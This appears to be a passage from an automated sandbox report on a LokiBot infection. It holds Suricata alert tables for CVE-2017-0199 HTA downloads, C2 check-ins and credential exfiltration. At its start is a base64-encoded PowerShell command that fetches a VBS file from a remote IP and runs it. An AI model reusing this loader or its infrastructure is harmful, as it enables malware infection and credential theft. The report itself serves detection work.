ICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", ProcessId: 3316, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:50:46.487667+0200	2024197	1	A Network Trojan was detected	192.3.176.141	80	192.168.2.22	49164	TCP
2024-10-25T19:50:49.146379+0200	2024197	1	A Network Trojan was detected	192.3.176.141	80	192.168.2.22	49166	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:50:46.487655+0200	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	192.3.176.141	80	TCP
2024-10-25T19:50:49.146373+0200	2024449	1	Attempted User Privilege Gain	192.168.2.22	49166	192.3.176.141	80	TCP
2024-10-25T19:51:08.991349+0200	2024449	1	Attempted User Privilege Gain	192.168.2.22	49171	192.3.176.141	80	TCP

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:51.113562+0200	2024312	1	A Network Trojan was detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:52.585611+0200	2024312	1	A Network Trojan was detected	192.168.2.22	49177	94.156.177.220	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:50.145221+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:51.616427+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-25T19:51:52.671652+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:53.908424+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:55.330639+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:56.433699+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:57.559759+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:59.256821+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:00.374097+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:01.495590+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:02.924655+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:04.043801+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:05.183331+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:06.351136+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:07.823914+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:08.973694+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:10.380036+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:12.508412+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:13.973613+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:15.125319+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:16.242299+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:17.452452+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:18.588953+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:19.696573+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:20.864617+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:21.996703+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:23.143979+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:24.540108+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:25.739974+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:26.830845+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:27.960200+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:29.089465+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:30.239136+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:31.348968+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:32.440484+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:33.550208+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:34.679063+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:36.585142+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.220	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:53.654785+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49178	TCP
2024-10-25T19:51:55.136764+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49179	TCP
2024-10-25T19:51:56.315085+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49180	TCP
2024-10-25T19:51:57.420554+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49181	TCP
2024-10-25T19:51:58.528171+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49182	TCP
2024-10-25T19:52:00.226865+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49183	TCP
2024-10-25T19:52:01.352272+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49184	TCP
2024-10-25T19:52:02.491875+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49185	TCP
2024-10-25T19:52:03.896823+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49186	TCP
2024-10-25T19:52:05.014452+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49187	TCP
2024-10-25T19:52:06.190968+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49188	TCP
2024-10-25T19:52:07.664910+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49189	TCP
2024-10-25T19:52:08.800242+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49190	TCP
2024-10-25T19:52:10.031535+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49191	TCP
2024-10-25T19:52:11.356894+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49192	TCP
2024-10-25T19:52:13.462575+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49193	TCP
2024-10-25T19:52:14.956948+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49194	TCP
2024-10-25T19:52:16.087518+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49195	TCP
2024-10-25T19:52:17.330751+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49196	TCP
2024-10-25T19:52:18.444630+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49197	TCP
2024-10-25T19:52:19.560466+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49198	TCP
2024-10-25T19:52:20.735097+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49199	TCP
2024-10-25T19:52:21.842413+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49200	TCP
2024-10-25T19:52:22.959303+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49201	TCP
2024-10-25T19:52:24.370764+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49202	TCP
2024-10-25T19:52:25.516183+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49203	TCP
2024-10-25T19:52:26.672545+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49204	TCP
2024-10-25T19:52:27.808891+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49205	TCP
2024-10-25T19:52:28.951444+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49206	TCP
2024-10-25T19:52:30.093255+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49207	TCP
2024-10-25T19:52:31.205724+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49208	TCP
2024-10-25T19:52:32.298660+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49209	TCP
2024-10-25T19:52:33.410305+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49210	TCP
2024-10-25T19:52:34.524336+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49211	TCP
2024-10-25T19:52:35.664690+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49212	TCP
2024-10-25T19:52:37.684229+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49213	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:53.648713+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:55.136616+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:56.284539+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:57.409276+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:58.522256+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:52:00.220924+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:01.346125+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:02.484796+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:03.891131+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:05.006829+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:06.185045+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:07.664194+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:08.794009+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:10.025133+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:11.347349+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:13.456769+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:14.951162+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:16.081321+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:17.297037+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:18.438249+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:19.554707+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:20.719023+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:21.835784+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:22.953058+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:24.369508+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:25.510015+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:26.666693+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:27.802867+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:28.944599+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:30.087566+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:31.199980+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:32.292784+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:33.404037+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:34.518597+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:35.658929+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:37.678244+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.220	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:53.648713+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:55.136616+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:56.284539+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:57.409276+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:58.522256+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:52:00.220924+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:01.346125+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:02.484796+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:03.891131+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:05.006829+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:06.185045+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:07.664194+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:08.794009+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:10.025133+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:11.347349+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:13.456769+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:14.951162+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:16.081321+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:17.297037+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:18.438249+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:19.554707+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:20.719023+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:21.835784+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:22.953058+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:24.369508+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:25.510015+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:26.666693+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:27.802867+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:28.944599+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:30.087566+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:31.199980+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:32.292784+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:33.404037+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:34.518597+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:35.658929+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:37.678244+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.220	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:50.145221+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:51.616427+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-25T19:51:52.671652+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:53.908424+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:55.330639+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:56.433699+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:57.559759+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:59.256821+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:00.374097+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:01.495590+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:02.924655+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:04.043801+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:05.183331+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:06.351136+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:07.823914+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:08.973694+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:10.380036+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:12.508412+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:13.973613+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:15.125319+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:16.242299+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:17.452452+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:18.588953+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:19.696573+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:20.864617+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:21.996703+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:23.143979+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:24.540108+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:25.739974+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:26.830845+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:27.960200+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:29.089465+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:30.239136+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:31.348968+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:32.440484+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:33.550208+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:34.679063+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:36.585142+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49213	94.156.177.220	80	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:33.195456+0200	2049038	1	A Network Trojan was detected	142.250.186.161	443	192.168.2.22	49174	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:50.145221+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:51.616427+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-25T19:51:52.671652+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:53.908424+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:55.330639+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:56.433699+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:57.559759+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:59.256821+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:00.374097+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:01.495590+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:02.924655+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:04.043801+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:05.183331+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:06.351136+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:07.823914+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:08.973694+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:10.380036+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:12.508412+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:13.973613+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:15.125319+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:16.242299+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:17.452452+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:18.588953+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
